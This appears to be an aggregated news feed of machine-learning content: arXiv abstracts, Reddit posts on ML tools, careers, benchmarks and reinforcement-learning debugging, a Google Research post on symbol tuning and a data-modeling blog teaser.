    Energy-based models are a simple yet powerful class of probabilistic models, but their widespread adoption has been limited by the computational burden of training them. We propose a novel loss function called Energy Discrepancy (ED) which does not rely on the computation of scores or expensive Markov chain Monte Carlo. We show that ED approaches the explicit score matching and negative log-likelihood loss under different limits, effectively interpolating between both. Consequently, minimum ED estimation overcomes the problem of nearsightedness encountered in score-based estimation methods, while also enjoying theoretical guarantees. Through numerical experiments, we demonstrate that ED learns low-dimensional data distributions faster and more accurately than explicit score matching or contrastive divergence. For high-dimensional image data, we describe how the manifold hypothesis puts limitations on our approach and demonstrate the effectiveness of energy discrepancy by training the energy-based model as a prior of a variational decoder model.  ( 2 min )
    Tackling Combinatorial Distribution Shift: A Matrix Completion Perspective. (arXiv:2307.06457v1 [cs.LG])
    Obtaining rigorous statistical guarantees for generalization under distribution shift remains an open and active research area. We study a setting we call combinatorial distribution shift, where (a) under the test- and training-distributions, the labels $z$ are determined by pairs of features $(x,y)$, (b) the training distribution has coverage of certain marginal distributions over $x$ and $y$ separately, but (c) the test distribution involves examples from a product distribution over $(x,y)$ that is {not} covered by the training distribution. Focusing on the special case where the labels are given by bilinear embeddings into a Hilbert space $H$: $\mathbb{E}[z \mid x,y ]=\langle f_{\star}(x),g_{\star}(y)\rangle_{{H}}$, we aim to extrapolate to a test distribution domain that is $not$ covered in training, i.e., achieving bilinear combinatorial extrapolation. Our setting generalizes a special case of matrix completion from missing-not-at-random data, for which all existing results require the ground-truth matrices to be either exactly low-rank, or to exhibit very sharp spectral cutoffs. In this work, we develop a series of theoretical results that enable bilinear combinatorial extrapolation under gradual spectral decay as observed in typical high-dimensional data, including novel algorithms, generalization guarantees, and linear-algebraic results. A key tool is a novel perturbation bound for the rank-$k$ singular value decomposition approximations between two matrices that depends on the relative spectral gap rather than the absolute spectral gap, a result that may be of broader independent interest.  ( 2 min )
    On Collaboration in Distributed Parameter Estimation with Resource Constraints. (arXiv:2307.06442v1 [cs.LG])
    We study sensor/agent data collection and collaboration policies for parameter estimation, accounting for resource constraints and correlation between observations collected by distinct sensors/agents. Specifically, we consider a group of sensors/agents each samples from different variables of a multivariate Gaussian distribution and has different estimation objectives, and we formulate a sensor/agent's data collection and collaboration policy design problem as a Fisher information maximization (or Cramer-Rao bound minimization) problem. When the knowledge of correlation between variables is available, we analytically identify two particular scenarios: (1) where the knowledge of the correlation between samples cannot be leveraged for collaborative estimation purposes and (2) where the optimal data collection policy involves investing scarce resources to collaboratively sample and transfer information that is not of immediate interest and whose statistics are already known, with the sole goal of increasing the confidence on the estimate of the parameter of interest. When the knowledge of certain correlation is unavailable but collaboration may still be worthwhile, we propose novel ways to apply multi-armed bandit algorithms to learn the optimal data collection and collaboration policy in our distributed parameter estimation problem and demonstrate that the proposed algorithms, DOUBLE-F, DOUBLE-Z, UCB-F, UCB-Z, are effective through simulations.  ( 2 min )
    Testing Sparsity Assumptions in Bayesian Networks. (arXiv:2307.06406v1 [stat.ML])
    Bayesian network (BN) structure discovery algorithms typically either make assumptions about the sparsity of the true underlying network, or are limited by computational constraints to networks with a small number of variables. While these sparsity assumptions can take various forms, frequently the assumptions focus on an upper bound for the maximum in-degree of the underlying graph $\nabla_G$. Theorem 2 in Duttweiler et al. (2023) demonstrates that the largest eigenvalue of the normalized inverse covariance matrix ($\Omega$) of a linear BN is a lower bound for $\nabla_G$. Building on this result, this paper provides the asymptotic properties of, and a debiasing procedure for, the sample eigenvalues of $\Omega$, leading to a hypothesis test that may be used to determine if the BN has max in-degree greater than 1. A linear BN structure discovery workflow is suggested in which the investigator uses this hypothesis test to aid in selecting an appropriate structure discovery algorithm. The hypothesis test performance is evaluated through simulations and the workflow is demonstrated on data from a human psoriasis study.  ( 2 min )


    NPC Steven acknowledged me finally!! 🤯 ChatGPT driven agents in Unreal Engine - update 3
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    What comes first, AI gf or AI bf?
    I was recently listening to an interview with George Hotz and the question came up: what will be invented first, an AI boyfriend or an AI girlfriend? Obviously he had some opinions; I'd be curious to hear what others have to say. submitted by /u/geepytee [link] [comments]  ( 8 min )
    Training an AI Copywriter
    I want to train an ai bot to be my copywriting sidekick, so it would help me write stuff in the voice, tone and format that my predecessor used. For this, I would need to feed it our entire webpage, some voice&tone norms, presentations and so on. Could you guys pls help me on how to set this up? I have an OpenAI API key, and they did make gpt4 available to use recently soo.. This should be doable right? Thanks boys submitted by /u/Jacobo_csgo [link] [comments]  ( 8 min )
    “Low-Resource” Text Classification: A Parameter-Free Classification Method with Compressors
    submitted by /u/IngloriousBastion [link] [comments]  ( 8 min )
    Apple is like the quiet guy in the corner watching a bar fight with the big 3; you know he is gonna do something REALLY bad ass, but what?
    Google, OpenAI, and Meta (Facebook, or whatever) have been having a free-for-all, trying to topple each other with GPT-5, Llama, and Bard. However, Apple has been REALLY quiet on the AI front, and focused on the release of this overpriced monstrosity, the Apple Vision Pro. It's a really big gamble with the $3500 price tag, but so was the iPhone many moons ago, and now everyone will dump their credit and their bank account for the latest iPhone Version Doodaad. I believe Apple is sidestepping this brawl to focus on perfecting augmented reality. This will ultimately unite the hardware with AR applications, and eventually lead to AI applications being embedded into the Vision Pro bundle. In short, while the Big 3 are playing "King of the AI Mountain" by pummeling each other to the ground…  ( 9 min )
    Where and how can I best train an Ai to really learn my art style?
    A lot of the AI tools I use just don't quite get what I'm asking them to do, and I'm not sure if I'm even able to train my own, considering it's a borg of everyone else's work, etc. I guess what I'm asking is if there is any tool out there that's standalone and not as watered down as a lot of the ones that are available (most of the time for free)? I have a bunch of images I can feed it, along with examples. If anyone has any tips, suggestions, or work-arounds, please let me know! Much appreciated. submitted by /u/Maelasae [link] [comments]  ( 8 min )
    What is xAI and Why Did Elon Musk Launch It? 2023
    submitted by /u/__boiyah [link] [comments]  ( 8 min )
    AI Art Creator for Animations
    Are there any free art creators yet for doing simple animations? Or does anyone have a link to how one would try to do this? TYIA. submitted by /u/Walfy07 [link] [comments]  ( 8 min )
    Is there a way to automatically enter free competitions?
    Is this possible, and if so, how would I go about it? Thanks for any help submitted by /u/captainofthememeteam [link] [comments]  ( 8 min )
    China moves to support generative AI, regulate applications
    China's internet watchdog and several other authorities, including the National Development and Reform Commission and the Ministry of Science and Technology, have jointly issued an interim regulation on the management of generative artificial intelligence (AI) services. The regulation, published on the website of the Cyberspace Administration of China (CAC) on Thursday, will go into effect on Aug. 15. submitted by /u/Tiger_Claw_1 [link] [comments]  ( 8 min )
    Looking to get into AI Research
    Hi, I am a high school student in my last year, looking to get into AI research and potentially start my own research in the future. What kind of further studies should I pursue in college with the aim of getting a PhD? It would be really helpful to know what degrees I should pursue in order to start my own research at some point. (Pardon my poor English.) submitted by /u/ShreeyanxRaina [link] [comments]  ( 8 min )
    AI Won’t Really Kill Us All, Will It? - The Atlantic (transcript and podcast)
    submitted by /u/RADICCHI0 [link] [comments]  ( 8 min )
    How do people actually make money using AI?
    I’ve been seeing a lot of posts about people making money off ChatGPT and other software. Is it even an industry worth getting into? submitted by /u/Hititfromtheback6969 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/12/2023
    Anthropic, the AI startup co-founded by ex-OpenAI execs, today announced the release of a new text-generating AI model, Claude 2. The successor to Anthropic’s first commercial model, Claude 2 is available in beta starting today in the U.S. and U.K. both on the web and via a paid API.[1] Elon Musk has launched an AI company to challenge ChatGPT creator OpenAI, which the billionaire tech mogul has accused of being “woke”. On Wednesday, xAI said the goal of the new company would be to “understand the true nature of the universe”.[2] Chip designer Nvidia will invest $50 million to speed up training of Recursion’s artificial intelligence models for drug discovery, the companies said on Wednesday, sending the biotech firm’s shares surging about 83%.[3] For decades, morning weather reports have relied on the same kinds of conventional models. Now, weather forecasting is poised to join the ranks of industries revolutionized by artificial intelligence. A pair of papers, published Wednesday in the scientific journal Nature, touts the potential of two new AI forecasting approaches — systems that could yield faster and more accurate results than traditional models, researchers say.[4] Sources: [1] https://techcrunch.com/2023/07/11/anthropic-releases-claude-2-the-second-generation-of-its-ai-chatbot/ [2] https://www.aljazeera.com/economy/2023/7/13/musk-launches-artificial-intelligence-rival-to-chatgpts-openai [3] https://www.reuters.com/technology/nvidia-invests-50-mln-recursion-train-ai-models-drug-discovery-2023-07-12/ [4] https://www.scientificamerican.com/article/climate-change-could-stump-ai-weather-prediction/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Best way to start learning?
    Where is the best place/way to start learning OpenAI/AI? Are there good tutorials? What about learning how to train a model? Would something else be better to start with? submitted by /u/jeffsmith202 [link] [comments]  ( 8 min )
    Project StyleScribble - generate text with your writing voice
    Wanted to share my new AI project: StyleScribble is an AI-powered web tool designed to assist content creators in generating text using their own unique writing voices. By leveraging the power of artificial intelligence, this tool revolutionizes the content creation process and empowers users to effortlessly produce high-quality written content. ​ https://preview.redd.it/4670phrcjmbb1.png?width=448&format=png&auto=webp&s=bb93bf358bf917e49668262a7e0a2ee7a2aa5ba2 Link to demo: https://huggingface.co/spaces/daniellefranca96/styles-scribble-demo Link to sign in on waitlist: https://stylescribble.fly.dev submitted by /u/katerinaptrv12 [link] [comments]  ( 8 min )
    Best FREE Chrome Extension for reusing prompts other than PromptDrive.ai?
    This is the best I can find so far but before I start investing a lot of time into uploading prompts to this tool, I wanted to make sure this was the best on the market. AIPRM is great for pre-done prompts but limits private prompts. Appreciate any help! submitted by /u/Life-Hacking [link] [comments]  ( 8 min )
    Best tool/system for keeping up and organizing AI tools... Notion, Clickup or...?
    I'm sure this comes down to preference but before I start spending a ton of time building this out, I wanted some feedback on what others have found that worked best? Clickup Example: https://doc.clickup.com/37456139/d/h/13q28b-364/176f834177eb5cb Notion Example: https://enchanting-trader-463.notion.site/AI-Database-f917ca2e609b45478fe7bc2c8d544877 Long time Evernote & G docs user but neither of these is cutting it. submitted by /u/Life-Hacking [link] [comments]  ( 8 min )

    [P] Colab - Generate JSON Dataset and Evaluate LLMs
    Here's a free colab notebook that I've been playing around with to generate JSON datasets from PDFs for fine-tuning LLMs and evaluate outputs/prompts for Toxicity, Bias, Quality etc. Colab: https://colab.research.google.com/drive/1KCn1HIeD3fQy8ecT74yHa3xgJZvdNvqL?usp=sharing GitHub Repo: https://github.com/kw2828/guardrail-ml submitted by /u/Educational_Grass_38 [link] [comments]  ( 8 min )
    [D] Looking to enroll in a MS in AI/ML
    I’m looking into getting my MS in ML soon, and I’m not sure if the market is good. Some friends and family are telling me it’s too saturated and you won’t find a job; others are telling me you still need LeetCode to get a job; and others tell me the job market is extremely competitive and you likely won’t get a job. I’m worried that I’m making a mistake. Here are some facts about me: 1. I currently am working at a company where I have 5 rotations every 9 months, 3 of which will be AI/ML related, which means I’ll definitely have at least 3 projects in hand on a global scale (the company is global). By the time I’m done with the MS, I’ll probably already have 2-3 years of hands-on experience. That’s about it. Should I be worried? Please advise me. Thank you submitted by /u/KManYuksi [link] [comments]  ( 9 min )
    [D] ICCV Reviews are NOT out
    zzz submitted by /u/Towzeur [link] [comments]  ( 8 min )
    [D] Ray vs. AWS Batch for Distributed Training
    Hello all, In our organization, we are currently using Metaflow as our managed training infrastructure and leveraging the `@batch` decorator for compute. Using Batch, we also have access to multi-node parallel jobs (`@parallel` decorator) for distributed training and we've used it to great effect for fine-tuning some LLMs. We are now thinking of adopting Ray Train since it seems to be very popular nowadays and is gaining lots of traction. Wondering how Ray Train compares to Metaflow (AWS Batch) and what the pros/cons are for both, particularly in the context of scalable training of models. Please kindly share any insights. Thanks in advance! submitted by /u/rirhun [link] [comments]  ( 8 min )
    Is the following a valid way to combine models? [D]
    I am a physician conducting research on intensive care data from many patients. I have full ethical approval, this is just exploratory, nobody will be treated based on my results, and I have no statistician. I have a question in principle, rather than looking for a specific solution. I have trained and tuned three models on my (very imperfect) data. They make binary predictions about the likely success of a treatment. I have developed a logistic regression model, a Gaussian naive Bayes model, and a C5.0 decision tree model. Each is imperfect in its own way. AUC for each is 0.72-0.79. I am wondering if I could ask each model to make predictions on a set of test data and let the models 'vote'. For example, if 2 of 3 models agree, then I create a 'majority opinion' column on my data and go with that result. I figure it might weed out some weakness. Is this a 'valid' way to do this, or is it pure nonsense in the world of machine learning? submitted by /u/e05bf027 [link] [comments]  ( 9 min )
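    What the post above describes is a standard ensemble technique, usually called hard (majority) voting, and it is entirely valid provided the vote happens on held-out data. A minimal plain-Python sketch (the three prediction lists are hypothetical, not from the poster's models):

```python
def majority_vote(*prediction_lists):
    """Combine binary predictions from several models by majority rule.

    Each argument is a list of 0/1 predictions for the same test rows;
    with an odd number of models there are no ties to break.
    """
    combined = []
    for votes in zip(*prediction_lists):
        combined.append(1 if sum(votes) > len(votes) / 2 else 0)
    return combined

# Hypothetical predictions from the three models on five test rows.
logreg = [1, 0, 1, 1, 0]
nb     = [1, 1, 1, 0, 0]
tree   = [0, 0, 1, 1, 1]

print(majority_vote(logreg, nb, tree))  # -> [1, 0, 1, 1, 0]
```

    The usual caveat: evaluate the 'majority opinion' column on data that none of the three models saw during training or tuning, otherwise the ensemble's AUC will look better than it is. scikit-learn's VotingClassifier implements the same idea, including "soft" voting on predicted probabilities, which often edges out hard voting.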
    [D] Text analysis alternative to LIWC?
    I'm working on a social science project and have a lot of text data that I would like to analyse between certain groups. Most of the papers that I've read on this use LIWC, but I unfortunately don't have access to that. An alternative I've found was the python package empath but it doesn't account for the use of pronouns which I know is going to be an important feature here. Does anyone know of a better alternative? Thanks a lot! submitted by /u/PlainJane049 [link] [comments]  ( 8 min )
    [R] Nvidia RTX 4090 ML benchmarks. Under QEMU/KVM. Image + Transformers. FP16/FP32.
    Motivation: I am running a Proxmox instance for tinkering with devops stuff, k8s, CI and so on, and wanted to also have the ability to run ML workloads, specifically any kind of ClosedAI open-sourced alternatives, like Guanaco, WizardLM, Starcoder, Codegen, as well as having some kind of pre-prod environment for ML deployments. Environment: All the tests were run within a virtual machine (QEMU) run using Proxmox 7.4-3. CPU: Intel Xeon 2696v4 2.2GHz Storage: Samsung SSD 870 EVO OS: Linux gpu-node 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux; DISTRIB_DESCRIPTION="Ubuntu 22.04.2 LTS" Python 3.10.12 (main, Jul 5 2023, 18:54:27) [GCC 11.2.0] on linux Torch version: 2.1.0.dev20230709+cu121 import torch; torch.version.cuda -> …  ( 9 min )
    [D] Stats package (JMP) vs machine learning for prediction
    CIO wants to predict "things" about mortgages using "technology". (There have been a few specifics and possible factors suggested, like if a loan was returned to us by the bank we sold it to). IT manager is super gung ho about using machine learning and AI. I'm not an experienced statistician, but I used JMP when I worked as a process engineer (yeah, squiggly career), and was like, why can't we just do this with JMP? I can figure out which factors are significant and which are most strongly correlated to what they want answers to. Is there a valid reason to go the machine learning route, or is it just a hot topic right now? No one seems willing to point out any flaws with that method and that makes me uncomfortable. submitted by /u/clarielz [link] [comments]  ( 9 min )
    TokenMonster Ungreedy Subword Tokenizer V4: Enables Models to be 4x Smaller Whilst Achieving Higher Chr/Token (With Evidence) [P]
    GitHub | Interactive Benchmark | Live Tokenizer TokenMonster is an ungreedy subword tokenizer and vocabulary trainer for Python, Go & Javascript. You can use one of my pretrained vocabularies or generate your own with the included tools. TokenMonster can tokenize text more efficiently than other tokenization methods, even when using a much smaller vocabulary. Here is a size 24000 TokenMonster vocabulary benchmarked against tiktoken cl100k_base (100256) and LLaMa (32000) (link to interactive benchmark): https://preview.redd.it/o16a9tbrurbb1.png?width=1506&format=png&auto=webp&s=66c11d2b8defd634c86756064125b70e8e5cb6d6 Unlike previous versions of TokenMonster, the current version does not compress the text into as few tokens as possible to achieve the high chr/token. TokenMonster V4 of…  ( 9 min )
    [P] INT-FP-QSim: Mixed Precision and Formats For Large Language Models and Vision Transformers
    Hello, We've released INT-FP-QSim: https://github.com/lightmatter-ai/INT-FP-QSim, a flexible simulator that allows running different LLMs and vision transformers at different formats (INT, FP) and precision (8-bit, 4-bit). The repository also has scripts for running simple evaluation with Stable Diffusion, Maskformer, Graphormer, ImageBind and CodeGen (with and without the simulator). Since there are users who may not have a good starting point for running different models, we hope that the example scripts provided in this repository will help there as well. submitted by /u/IllustriousSir_007 [link] [comments]  ( 8 min )
    [P] Federated Learning framework
    Hello everyone 👋 We have launched a new project called MetisFL, a federated learning framework that allows developers to federate their machine learning workflows and train their models across distributed datasets without having to collect the data in a centralized location. https://github.com/NevronAI/metisfl Any feedback, or even a simple star, would be highly appreciated! submitted by /u/No-Literature-1930 [link] [comments]  ( 8 min )
    [P] Curated Transformers: Library of PyTorch LLM and other transformers, with common components
    https://github.com/explosion/curated-transformers/ Curated Transformers is a new library of PyTorch LLM and other transformer architectures, implemented using common components. The library makes a different trade-off from Huggingface Transformers, which uses wholly separate implementations for each architecture. The advantage of HF's approach is that they can adopt new architectures very quickly, by taking the academic implementation more or less verbatim. Curated Transformers won't be able to add architectures as quickly, but the implementations share common elements, making it easier to mix and match components and see how architectures differ. We'll also be able to share bug fixes and improvements between different models. Check it out if you're interested in mixing and matching parts of different models, or if you just want a lighter-weight, pure-PyTorch experience, without any intervening abstractions. Supported encoder-only models: ALBERT BERT CamemBERT RoBERTa XLM-RoBERTa Supported decoder-only models: GPT-NeoX LLaMA Falcon Generator wrappers: Dolly v2 Falcon All models can be loaded from Huggingface Hub. spaCy integration for curated transformers is provided by the spacy-curated-transformers package. submitted by /u/syllogism_ [link] [comments]  ( 9 min )
    [R] PyTorch DeepLab/MMSegmentation Tutorial Resources
    I've hit a bit of a roadblock. I'm struggling to find tutorials with PyTorch code for Semantic Segmentation. I initially used the MMSegmentation tutorial on its GitHub, but that didn't work as there were a number of missing files. Any help would be massively appreciated as I'm really struggling. submitted by /u/Charako [link] [comments]  ( 8 min )
    [Research] Incorporating additional information into the latent space of CNNs?
    Context: The input is a 3D MRI image, as well as a position and an orientation, both in 3D. The output is a 3D image. The most likely candidate architecture is 3D U-Net. In general we are trying to predict how a brain will be stimulated by a magnet producing an electric field; the position and orientation I am talking about are those of the magnet. If you are interested, this paper works on the same problem: doi.org/10.1371/journal.pone.0254588 Question: How do we incorporate multiple different input types (image + vectors) into CNNs? We know the position and orientation information is extremely relevant to the output, meaning we know it can be incorporated directly into the latent space; what I don't understand is how to incorporate the two vectors into the latent space while keeping the feature dimensions. I can think of two options: 1) add additional feature layers to the latent space in which every layer holds one value constant across the entire layer; that way, if we have 2 vectors and an angle, we would add 7 feature layers to the latent space. Here I am not sure the network can work with these, since they only really have meaning if you put them together into a vector. 2) completely flatten the latent space, add the values, and then reshape back into form. Here I doubt this is a good idea, since we are destroying all localization information from the features. Previous approach: One solution we have thought about is feeding the network the MRI image as if it were taken from that position and orientation, thereby incorporating the information indirectly. This solution produces the most accurate results in previous papers. Unfortunately, that solution leads to too long a preprocessing time, and since we need the inference to be real-time it is not a valid solution. submitted by /u/ClumsyClassifier [link] [comments]  ( 9 min )
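    Option (1) in the post above is in fact the common approach: broadcast each conditioning scalar to a constant feature map and concatenate it to the latent channels; a 1×1 convolution afterwards lets the network learn to recombine the constant channels, so the "only meaningful as a vector" worry is handled by learned mixing. A toy sketch with nested lists standing in for tensors (shapes and values are made up):

```python
def append_constant_channels(latent, scalars):
    """Append one constant feature map per conditioning scalar.

    latent  : list of C feature maps, each an HxW nested list
    scalars : flat list of conditioning values (e.g. 2 vectors + 1 angle = 7)
    Returns a (C + len(scalars)) x H x W latent.
    """
    h, w = len(latent[0]), len(latent[0][0])
    extra = [[[s] * w for _ in range(h)] for s in scalars]
    return latent + extra

latent = [[[0.0, 0.1], [0.2, 0.3]]]   # C=1, H=W=2 toy latent
cond = [1.0, -0.5, 0.25]              # e.g. part of a position vector
out = append_constant_channels(latent, cond)
print(len(out), out[1][0][0])  # -> 4 1.0
```

    This preserves the spatial layout of the features, unlike flattening (option 2). In a real 3D U-Net the same trick appends constant D×H×W volumes, typically at the bottleneck.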
    [P] Journal Hub - literature discussion platform project
    [ Removed by Reddit on account of violating the content policy. ] submitted by /u/iokarkan [link] [comments]  ( 8 min )
    [R] Deep Learning Models for Forest Canopy Estimation
    I need to either build a tool or use a service that can take a satellite image of trees as input and output an estimate of the forest canopy. Has anyone used, or does anyone know of, such deep learning models? Thanks. submitted by /u/Quantumercifier [link] [comments]  ( 8 min )
    [D] Overview of recent developments in audio-generative models (TTS & TTM)
    Hi everyone, I wrote a blog post on the advancements in Generative AI for audio, focusing on Text-to-Speech (TTS) and Text-to-Music (TTM) models. I survey how techniques from LLMs have been adapted for audio generation, leading to significant improvements. The article takes a technical look at some of the recent models in this space, including MusicLM, VALL-E, and also explains the key ideas behind Neural Audio Codecs and Residual Vector Quantization techniques, which have become essential in nearly all text-to-audio models. If you have an interest in the current state and future of Generative AI for audio, I hope you will find this informative! I drop the article link in the comments below 👇👇👇 I appreciate any feedback or thoughts you may have! submitted by /u/mrx-ai [link] [comments]  ( 9 min )
    [P] Fast debugging of audio machine learning models
    I have recently improved a library I created to support finding issues in audio data using audio embeddings. A mix of automatically detecting problematic data clusters and reviewing them visually can help speed up model debugging. The principle behind this is as follows: Step 1: Compute audio embeddings for the raw data 🎶 This makes the data explorable by audio similarity. Depending on the properties the model captures, you will get different notions of similarity. E.g., if you use a model for speaker identification, you will probably order your data according to the speaker's voice properties. Step 2: Identify problematic data slices using clustering 🔍 One strategy to get explicit suggestions for problematic data slices is clustering the samples based on audio embeddings. You can then compute your evaluation metrics for the identified clusters and search for clusters that, compared to the overall accuracy, show a significant accuracy drop. Step 3: Review the supposed issues visually 👀 Especially when using only unstructured data, the results of your analysis will not be readily interpretable. However, reviewing the problematic clusters by listening and visualizing (e.g., drawing spectrograms) will help you filter out actual model and data issues. I also created a Medium Post and an Example Notebook for this. Also check out this Interactive Result Visualization on Huggingface. submitted by /u/OkResearch6289 [link] [comments]  ( 9 min )
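    Step 2 above — computing an evaluation metric per embedding cluster and flagging underperforming slices — can be sketched in a few lines of stdlib Python (the cluster IDs and correctness flags below are hypothetical placeholders for the output of your clustering and evaluation):

```python
from collections import defaultdict

def per_cluster_accuracy(cluster_ids, correct_flags):
    """Accuracy per cluster, for flagging problematic data slices."""
    totals, hits = defaultdict(int), defaultdict(int)
    for cid, ok in zip(cluster_ids, correct_flags):
        totals[cid] += 1
        hits[cid] += int(ok)
    return {cid: hits[cid] / totals[cid] for cid in totals}

clusters = [0, 0, 0, 1, 1, 1]   # from clustering the audio embeddings
correct  = [1, 1, 1, 0, 0, 1]   # per-sample model correctness
print(per_cluster_accuracy(clusters, correct))  # -> {0: 1.0, 1: 0.3333333333333333}
```

    Clusters whose accuracy falls well below the overall figure are the ones worth listening to in Step 3.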
    [D] Overfit ML model
    Hello, this is my first contribution to the sub. I have a dataset for a classification problem, and it seems that all the models I have trained are overfitting (F1 score close to 1). I can't wrap my head around how to solve it without removing important values. submitted by /u/Archyve [link] [comments]  ( 8 min )
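    An F1 score close to 1 on evaluation data is most often a symptom of leakage rather than of the model: duplicated rows shared between train and test, a feature that encodes the label, or resampling done before the split. A minimal stdlib check for the first of these (the toy rows are made up):

```python
def overlap_fraction(train_rows, test_rows):
    """Fraction of test rows that also appear verbatim in the training set.

    Rows are made hashable as tuples; any overlap inflates test metrics.
    """
    train_set = {tuple(r) for r in train_rows}
    dupes = sum(1 for r in test_rows if tuple(r) in train_set)
    return dupes / len(test_rows)

train = [[1.2, 0.4, 0], [3.1, 0.9, 1], [2.2, 0.5, 0]]
test  = [[3.1, 0.9, 1], [4.0, 1.1, 1]]   # first row leaked from train
print(overlap_fraction(train, test))  # -> 0.5
```

    If the overlap is zero, the next suspects are label-derived feature columns and preprocessing (scaling, oversampling) fitted on the full dataset instead of on the training split only.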
    [D] How to accelerate ViT models further
    I have conducted experiments and examples on accelerating ViT (Vision Transformer) using methods such as TensorRT, FasterTransformer, and xFormers. The experiments were conducted using a single A100 as a baseline. - https://github.com/bnabis93/vision-language-examples/tree/main/acceleration In xFormers, I tried applying sparse attention and memory-efficient attention to ViT, but there was an issue where the speed actually decreased. Therefore, I excluded those results. Generally, just performing TensorRT conversion significantly improves latency. In the case of faster transformer, optimized kernels are not provided in fp32, so it is not as effective as expected. However, after quantizing to fp16 and obtaining the results, it was more effective than simply performing TensorRT conversion. Are there any other methods for accelerating ViT? Using OpenAI's Triton is one option that comes to mind. If you have any other methods worth trying, I would appreciate it if you could let me know. submitted by /u/bono-93 [link] [comments]  ( 9 min )
    [P] LLMs, NLP: Building a Model to Generate and Analyze Claim Narratives
    Hi all. I'm diving into the world of Natural Language Processing (NLP) and Large Language Models (LLMs), and I could really use some assistance with my project. Here's what I'm aiming to achieve: Imagine having a dataset with various features such as location, type of claim, and claim payment. Additionally, there's a column dedicated to narratives, which provide descriptions of each claim. For instance, a narrative could be "I was crossing the street and was hit by a car, which broke my leg." My goals are twofold: i) Develop a model capable of taking the three columns (type of claim, claim payment, and location) as input and generating a narrative. ii) Create another model that does the reverse: input a narrative and extract relevant information like the type of claim and the location. I would greatly appreciate any advice, or resources you can provide. Thank you in advance! submitted by /u/therobot20 [link] [comments]  ( 9 min )
    [D] Encoder-only vs encoder-decoder vs decoder-only
    I understand that encoder-only models (like BERT, etc.) are mainly for learning representations of words taking context from both sides. What I'm confused about is why you would need decoder-only vs encoder-decoder models. GPT and BLOOM are decoder-only, while I think T5 is enc-dec; I'm not sure why you would use one vs the other. Intuitively an enc-dec model has more parameters and should be better at tasks where you have both complex text input and output, like, say, translation or summarization. Any ideas why decoder-only models are desirable, and also why they seem to work so well? Thanks in advance. submitted by /u/Western-Image7125 [link] [comments]  ( 8 min )
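    Mechanically, the difference between the two comes down to the attention mask: an encoder attends bidirectionally (an all-ones mask), while a decoder applies a causal mask so position i only sees positions ≤ i, which lets one forward pass train a next-token prediction at every position. A minimal sketch:

```python
def causal_mask(n):
    """Lower-triangular attention mask used by decoder-only models.

    mask[i][j] == 1 means position i may attend to position j; an
    encoder-only model like BERT would use all ones (bidirectional).
    """
    return [[1 if j <= i else 0 for j in range(n)] for i in range(n)]

for row in causal_mask(4):
    print(row)
# -> [1, 0, 0, 0]
#    [1, 1, 0, 0]
#    [1, 1, 1, 0]
#    [1, 1, 1, 1]
```

    That training efficiency, plus the fact that a single next-token objective covers both understanding and generation, is a large part of why decoder-only models scale so well; enc-dec models like T5 still tend to shine when input and output are clearly distinct sequences, as in translation.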

    "Reinforcement Learning in Newcomblike Environments", Bell et al 2021
    submitted by /u/gwern [link] [comments]  ( 8 min )
    REINFORCE with Baseline not Learning
    I have implemented REINFORCE using PyTorch and am testing it on the CartPole environment. My implementation allows for an optional baseline to be applied. At present, the baseline used is simply the mean of the returns earned during a trajectory. The agent will learn a good policy when I DO NOT use a baseline, but when I apply the baseline, the agent fails to learn anything. I cannot figure out why. I notice that the loss is always very close to zero when using the baseline, but it seems like that should be expected. When the network weights are still random, most of the actions will have a probability that is near 0.5, and thus a log probability that is close to log(0.5) ≈ -0.7. The returns for this environment are symmetric about the mean, so the weighted sum of the centered return…  ( 9 min )
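    For reference, the usual way the baseline enters REINFORCE: it is subtracted from each return before the return weights the log-probability, and a state-independent baseline leaves the gradient unbiased while reducing variance. A pure-Python sketch of that computation (a generic illustration, not the poster's code):

```python
def reinforce_weights(rewards, gamma=0.99, use_baseline=True):
    """Discounted returns G_t, optionally centered by their mean.

    The policy-gradient loss is then -sum(w_t * log pi(a_t|s_t));
    subtracting a constant baseline lowers variance without changing
    the gradient's expectation.
    """
    returns, g = [], 0.0
    for r in reversed(rewards):
        g = r + gamma * g
        returns.append(g)
    returns.reverse()
    if use_baseline:
        mean = sum(returns) / len(returns)
        returns = [g - mean for g in returns]
    return returns

print(reinforce_weights([1.0, 1.0, 1.0], gamma=1.0))  # -> [1.0, 0.0, -1.0]
```

    One thing worth checking in the failing setup: a baseline computed as the mean of the same trajectory's returns depends on the actions taken, so it is not a valid state-independent baseline and can bias the gradient; also make sure no gradient flows through the baseline term. Averaging returns across a batch of trajectories, or learning a state-value baseline, is the standard fix.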
    Beating DeepMind’s Game: Alchemy
    submitted by /u/Ok_Introduction9109 [link] [comments]  ( 8 min )
    Is offline-to-online RL some kind of Transfer-RL?
    I read some papers about offline-to-online (O2O) RL and transfer RL, and I have been trying to explore O2O transfer RL, where we have data for one environment, pre-train a model offline, then improve it online in another environment. If the MDP structure is the same for the target and source environments while transferring, what is the exact difference between O2O RL and transfer RL under this assumption? Essentially they are both trying to adapt to the distribution drift, aren't they? submitted by /u/Blasphemer666 [link] [comments]  ( 8 min )
    PPO agent completing Street Fighter III on our RL Platform, it consistently outperformed when using deterministic actions instead of sampling them proportionally to their probability. Why in your opinion? (see comment for details)
    submitted by /u/DIAMBRA_AIArena [link] [comments]  ( 8 min )

    Symbol tuning improves in-context learning in language models
    Posted by Jerry Wei, Student Researcher, and Denny Zhou, Principal Scientist, Google Research A key feature of human intelligence is that humans can learn to perform new tasks by reasoning using only a few examples. Scaling up language models has unlocked a range of new applications and paradigms in machine learning, including the ability to perform challenging reasoning tasks via in-context learning. Language models, however, are still sensitive to the way that prompts are given, indicating that they are not reasoning in a robust manner. For instance, language models often require heavy prompt engineering or phrasing tasks as instructions, and they exhibit unexpected behaviors such as performance on tasks being unaffected even when shown incorrect labels. In “Symbol tuning improves…  ( 93 min )

    Data modeling techniques in modern data warehouse
    Hello, data enthusiasts! In this article, let's discuss data modeling, from the traditional and classical approaches through to today's digital practice, especially for analytics and advanced analytics. Of course, for the last 40+ years we all worked with OLTP, and after that we started focusing on OLAP. After the cloud era came into the picture… Read More »Data modeling techniques in modern data warehouse The post Data modeling techniques in modern data warehouse appeared first on Data Science Central.  ( 26 min )
    A Detailed Guide for Data Handling Techniques in Data Science
